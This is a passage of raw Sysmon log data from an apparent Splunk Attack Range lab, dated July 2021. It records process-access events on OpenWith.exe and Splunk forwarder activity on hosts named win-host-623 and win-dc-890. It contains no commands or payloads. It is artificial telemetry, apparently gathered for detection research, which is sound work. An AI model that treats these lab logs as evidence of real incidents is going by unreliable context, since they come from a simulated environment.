Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.292{0C1E0330-F788-60EB-C779-00000000D001}1220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:24.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=122205FC4C2913A64D595C65D910CA1A,SHA256=1ED4D2E8A40AB8AF21B4FF04FEE92B5550BD5B9D937357742F4F56AD3C6DCE7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B7ECE222DC7423A14F8E471ADB8BB80A,SHA256=DBDCAF7697BB96A9EE9FC2B3D8BBADF435832B3CD39259EB17F7DB78E77B502B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A2D20EF768FB2C07C3C74310B079A85C,SHA256=46EDC1AD2E434E37016C0E699297125EA5FC2FAE93671EFB66C59E82FA8503A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.855{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A8C8F769D9D4B1045C3DECE4CAC3EC3,SHA256=426F1DE0404A00EA61FE72CA65210381613FC465255C3C9CB3F721CB8CFEB400,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.387{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2942D711F1BC61FE851E5DC96B1E70D5,SHA256=F89FCC9C6E917111D699CEA957EE9718A4F548CA2AF0D8DB38DCA0D7E727687C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.387{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.371{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.371{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.371{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\Windows.UI.Immersive.dll+1d16|C:\Windows\System32\Windows.UI.Immersive.dll+2362|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.UI.Immersive.dll+2f6d|C:\Windows\System32\Windows.UI.Immersive.dll+2213|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.355{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.349{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.334{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.334{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.334{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.334{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.255{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.255{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053367Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.229{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053366Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.227{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053365Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.227{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053364Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.211{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F788-60EB-CF7D-00000000CF01}8372C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.209{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.209{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053361Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.209{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053360Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.208{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053359Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 